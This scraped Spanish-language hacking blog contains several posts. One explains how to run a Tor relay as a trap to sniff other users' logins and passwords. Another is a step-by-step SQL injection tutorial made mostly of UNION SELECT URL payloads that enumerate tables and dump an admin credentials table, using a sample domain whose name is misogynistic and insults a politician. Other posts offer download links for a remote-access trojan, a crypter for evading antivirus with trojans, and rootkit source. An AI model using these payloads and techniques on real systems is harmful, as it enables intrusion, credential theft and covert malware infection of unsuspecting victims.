Problemas
Buscador
Bueno, buscando entre mis archivos encontre un manual XSS ("Cross Site Scripting", es XSS no CSS por que se puede confundir con "Cascade Styke Sheet"). El manual esta bien bueno, es didactico y explica muy bien la vulnerabilidad.
[+]Descargar:
Rapidshare
Badongo
DepositFiles
MegaUpload
Montar servidor trampa y capturar informacion sensible
Publicadas por DecodeX01 a las 1:44 Categorias CAPTURAR, INFORMACION, PAPER, SENSIBLE, TOREsta vez explicare como montar un servidor trampa para capturar logins y pass
de gente que no se lo espera o confia ciegamente en el sistema que vamos a usar :)
Los elementos necesario seran:
1) Un sniffer de nuestra eleccion, wireshark es mi eleccion
2) Un analizador del trafico capturado con el sniffer, yo usare
Network Miner (para mayor comodidad al leer el registro).
3) Tor
4) Paciencia
Comenzemos:
- Bajemos e intalemos el sniffer a eleccion...
- Nos bajamos el analizador del trafico del sniffer, pueden usar cualquiera que gusten
yo usare el Network Miner por su simpleza y porque aparte me gusta como trabaja
(tambien puede snifear pero a mi personalemente me gusta el Wireshark).
- Nos bajamos e instalamos el tor.
- Lo configuramos para que actue de relay server, pero nos fijamos que el ancho de banda
que le asignemos no sea mayor a nuestra conexion, o muy elevado, puesto que si es asi
muchas veces nos caeremos por el flood generado por las conexiones entrantes a nuestro
servidor.
- Seteamos el sniffer para que tome todo el trafico de nuestra placa de red que nos brinda
la conexion a internet, y lo hacemos correr.
- Iniciamos el tor en modo servidor, y dejamos que corra un tiempo (cuanto mas tiempo corra
mas cosas podemos llegar a sacar)
- y por sobre todo tengamos paciencia mucha pasiencia
- al cabo de 1 o 2hs podemos revisar que fue todo lo que registro el sniffer, parando el tor como servidor
y abriendo el pcap (archivo log del sniffer) en el Network Miner, en sus diferentes pestañas tenemos
discriminadas las diferentes cosas que capturamos.
Bueno con esto damos fin a este sencillo pero eficas y copado paper de como montar un servidor trampa
para caprurar informacion sensible atravez de tor.
Link a herramientas del paper:
Wireshark:
Windows Installer (32-bit)
Windows Installer (64-bit)
Windows U3
Windows PortableApps
OS X 10.5 (Leopard) Intel .dmg
OS X 10.5 (Leopard) PPC .dmg
Source Code
====================================================================================
Network Miner:
NetworkMiner-0.91.zip
NetworkMiner-0.91_source.zip
====================================================================================
Tor:
Vista, XP, 2000, 2003 Server, Millenium, 98SE
0.2.1.23 Version Estable
0.2.2.7-alpha Version en desarrollo
Guía de instalación y configuración
====================================================================================
Tor Browser Bundle para Windows (Contiene Tor, Vidalia, Torbutton, Polipo, y Firefox)
0.2.1.23 Version en desarrollo
Guía de Instalación y Configuración
====================================================================================
Tor IM Browser Bundle para Windows (Contiene Tor, Vidalia, Torbutton, Polipo, Firefox, y Pidgin)
0.2.1.23 Version en desarrollo
Guía de Instalación y Configuración
====================================================================================
Mac
Binario Universal (OSX 10.4 & 10.5)
0.2.1.24 Version Estable
0.2.2.8-alpha Version en desarrollo
Guía de instalación y configuración
====================================================================================
Mac
Sólo PowerPC (OSX 10.3)
0.2.1.24 Version Estable
0.2.2.8-alpha Version en desarrollo
Guía de instalación y configuración
====================================================================================
Linux:
link con info para diferentes distros
Guía de instalación y configuración
====================================================================================
y por ultimo pero no por ello menos importante:
Paciencia, dificil de encontrar pero si buscan aparece :)
Paper realizado con fines educativos para Code-Horror.BlogSpot.com y www.blhack.com.ar por DecodeX01.
Have Fun with the sniffing. ;D
Bueno iniciemos este post dedicado a algo tan comun como una inyeccion SQL, simple, sensilla y poderosa :D
(En mi opinion personal el deface es de personas con baja autoestima que solo quieren llamar la atencion de los demas modificando el index o subdirectorios de una web y darse de "hacker")
Nota legal: la web ejemplo es inexistente y nose intenta dañar a ninguna autoridad y/o persona real fictisia.
########################################################################################################################
Lo primero sera buscar un sitio vulnerable (este paso lo obviare por razones obvias no?)
cuando encontramos un sitio vuln o que creemos que puede ser vuln procedemos a agregarle en la url (direccion del sitio)
una comilla simple ' al final de la URL si vemos que nos da error, puede que sea vuln o no como pasa aveces para confirmar si lo es o no 100%
procedemos a agregarle al sitio algo asi al final de la URL: +order+by+9999999-- si nos sale algo de: unknown column '9999999'
significa que es vulnerable, por si no se entendio como es que tendria que querdar con el ejemplo de arriba seria asi:
http://www.klistinaesputaylosabemos.com/index.php?id=15' <--- este seria el primer ejemplo
http://www.klistinaesputaylosabemos.com/index.php?id=15+order+by+9999999-- <--- este seria el segundo
Si vemos que los errores arriba descriptos procedemos a ver la cantidad de tablas que tiene su bd atravez de:
order by de la seguiente forma:
http://www.klistinaesputaylosabemos.com/index.php?id=15+order+by+20-- <--- si nos da error de: unkwon column '20'
bajamos la cantidad de tablas a por ejemplo 15 o 10, si en el caso de que no nos de error de nada, procedemos a aumentar
la cantidad de tablas en la inyeccion de la seguiente forma:
http://www.klistinaesputaylosabemos.com/index.php?id=15+order+by+30--
si sucede algo de lo ante dicho arriba, ya sea error de columna no encontrada o pagina sin error, procedemos ya sea el caso a
aumentar o disminuir las tablas segun sea el caso.
Una vez que localizamos el numero de tablas procedemos a unirlas todas con:
http://www.klistinaesputaylosabemos.com/index.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
(la inyeccion de arriba es solo un ejemplo imaginario de que el sitio ese tenga 21 tablas)
para que se impriman las tablas en pantalla podemos usar 2 metodos, el mas comun es:
http://www.klistinaesputaylosabemos.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
se reemplazo el numero 15 que estaba antes por un numero negativo en este caso -1, pero si en el caso de que no nos deje asi
podemos usar algo similar, pero del mismo accionar:
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
lo que hacemos en ese caso es dejar el valor original, en este caso el 15, y le agregamos una comprovacion falsa,
que genera un valor incorrecto, porque como sabemos 1 no es igual a 2 o si?
bueno atravez de esa inyeccion le pasamos un valor que nos imprimira las tablas en pantalla, apartir de aqui podemos proceder a
seguir viendo que podemos sacar, de la bd, siempre y cuando sea MySQL 5.X puesto que la version de MySQL 4.X no tiene
information_schema, sin lo cual tendremos que adivinar o fuzear las tablas para poder ver cuales tenemos.
Simulemos que en el caso de arriba tenemos MySQL 5.X
la inyeccion se puede hacer de varias formas veremos desde la mas simple hasta la mas "avanzada" forma de hacerlo
suponiendo que se impriman en pantalla las tablas: 3,6,9, procedemos a inyectar valores en ellas
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
inyectamos en el 3 el operando: version() con el mismo comprovamos que version de bd usa, en este caso como dijimos
usan MySQL 5.X, asi que podemos proceder a usar information_schema de la siguiente forma:
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,group_concat(concat_ws(CHAR(58),table_names))3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables--
con esta inyeccion nos imprimira en pantalla las tablas de la bd separadas por un ":" (sin las comillas dobles),
puede que si lo acemos asi, no nos llege a imprimir todas las tablas de suceder esto, lo que podemos hacer es:
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,concat_ws(CHAR(58),table_names)3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+XXX,1--
donde XXX es el ultimo numero de tabla que salio, supongamos que con la primer inyeccion no salieron todas las tablas, para poder
sacarlas todas podemos inyectarla asi:
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,concat_ws(CHAR(58),table_names)3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+55,1--
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,concat_ws(CHAR(58),table_names)3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+56,1--
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,concat_ws(CHAR(58),table_names)3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+57,1--
y asi suseivamente hasta que salga la ultima, una vez que tengamos todas, podemos ver cual de ellas queremos ver sus columnas
supongamos que una tabla que salio se llama: admin
bueno para ello procedemos a inyectarnos de la siguiente manera:
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,group_concat(concat_ws(CHAR(58),column_names))3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name=CHAR(97, 100, 109, 105, 110)--
lo que hace esa inyeccion es pedirle a la bd que nos imprima todas las columnas de la tabla admin
una vez que sabemos el contenido de la tabla admin, es decir sus columnas, podes ver que sus elementos son:
id, login, password, email
para dumpear el contenido completo procedemos a inyectarnos de la siguiente manera:
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,group_concat(concat_ws(CHAR(58),id,login,password,email))3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admin--
lo cual nos da como resultado:
1, lacolaentrego, minombreesklistina, soyputa@presidencia.gov.ar
y listo dumpeada la tabla admin :D
pero en caso de que por alguna extraña razon no nos imprima podemos usar un metodo mas:
http://www.klistinaesputaylosabemos.com/index.php?id=15+AND+1=2+union+select+1,2,unhex(hex(group_concat(concat_ws(CHAR(58),id,login,password,email))))3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admin--
lo que hace eso es pasar la inyeccion en hex a la bd, y nos regresa el contenido, en texto plano, siempre esta el caso de los md5
que como todos sabemos no es texto plano.
###############################################################################################################################
Apendice HackBar
HackBar es un addon de ffx que nos permite hacer muchas cosas, entre ellas, poder crear una inyeccion con las tablas esactas
que usaremos en nuestra inyeccion, pero eso se los dejo un poco a su imaginacion, solo les dire que revisen la pestaña
MySQL, ay tienen todo lo necesario para un test de sqli en mysql ;D
suerte a todos y espero que les aya servido/gustado mi pequeño paper!
SS-RAT 0.6 Beta (Schwarze Sonne RAT) Actualizado!
Publicadas por Nadie a las 14:57 Categorias TROYANOSSS-RAT es un RAT (Remote Administration Tool o conocido tambien como "troyano" )programado por Slayer616 con una GUI muy buena. Es la version 0.5. Que tiene de nueva esta version con respecto a otros RATs, es que tiene una forma de hacer clics remotos, es decir, clics asi como el teamviewer.
[+]Imagenes:
[+]Caracteristicas:
-Thumbnailview
-Remoteclick
-Autosize Screencapture
-Multi IP-Connector
-Servicemanager
-Windowmanager
-New Password Recovery Tool System
-Several Bugfixes!
[+]Descargas:
DESCARGAR DepositFiles
DESCARGAR RapidShare
DESCARGAR Badongo
DESCARGAR Zshare
DESCARGAR MegaUpload
Version 0.6 beta
DESCARGAR DepositFiles
DESCARGAR RapidShare
DESCARGAR Badongo
DESCARGAR Zshare
DESCARGAR MegaUpload
PASS: blhack.com.ar
SD Crypter es un encriptador runtime creado por SDWirus de Brazil. Es un encriptador simple con opciones de EOF data y icono, es decir, podras encriptar troyanos como bifrost, spynet,etc. Tiene una GUI bastante buena, ademas de que viene con musica, eso hace que al iniciarse demore un poco, y su tamaño en memoria es de 30mb Aprox.
[+]Imagenes:
[+]Descarga:
Descargar desde Zshare
Descargar desde MegaUpload
Descargar desde RapidShare
Descargar desde Badongo
Descargar desde DepositFiles
Schwarze Sonne Rootkit [SC]
Publicadas por Nadie a las 20:43 Categorias CODIGO DE FUENTE, ROOTKITS, SOURCESSchwarze Sonne Rootkit es un rootkit programado por Slayer616, tambien colaboraron Cobein, Aphex y Magic. La GUI es bastante parecida a los microsoft office 2007. El source de esta aplicacion es bastante liviano, solo pesa 235kb. Es un source VB6 (Visual Basic 6).
[+]imagenes:
[+]Caracteristicas:
(Segun el creador)
-modular Multilanguage
-Profile System
-Kewl Ribbon GUI *HOT*
-Hide Processes/Files
-Protect Processes/Files
-Block Processes
-Usermode API Unhook (Bypass Sandboxies, lowgrade AV/FWs) //not included
-Installation
-Startup
-Self Protection
-cryptable Rootkit! *HOT*
-XP/Vista compitable!
-OPENSOURCE::::>Customizable.
[+]Descargas:
(Video Tutoriales del autor)
How to hidden Poison ivy with rootkit (Como ocultar PI con el rootkit)
How to hidden Bifrost with rootkit (Como ocultar Bifrost con el rootkit)
Schwarze Sonne Rootkit [SC] Diferentes mirrors:
Desde Badongo
Desde Megaupload
Desde Rapidshare
Desde Zshare
Desde DepositFiles
Subida Oficial
Saludos
Suscribirse a:
Entradas (Atom)
Entradas
